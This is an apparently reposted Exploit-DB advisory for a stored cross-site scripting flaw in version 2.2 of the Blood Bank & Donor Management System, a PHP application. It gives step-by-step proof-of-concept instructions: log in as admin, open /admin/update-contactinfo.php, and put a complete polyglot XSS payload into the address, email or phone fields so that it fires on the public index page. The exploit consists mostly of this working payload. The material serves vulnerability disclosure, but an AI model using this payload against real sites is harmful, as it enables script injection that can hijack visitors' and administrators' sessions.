[remote] Blood Bank & Donor Management System using v2.2 - Stored XSS
2024-1-29 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏
2024-1-29 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏
# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
# Application: Blood Donor Management System
# Version: v2.2
# Bugs: Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Date: 12.09.2023
# Author: SoSPiro
# Tested on: Windows
#POC
========================================
1. Login to admin account
2. Go to /admin/update-contactinfo.php
3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.
4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.
文章来源: https://www.exploit-db.com/exploits/51750
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh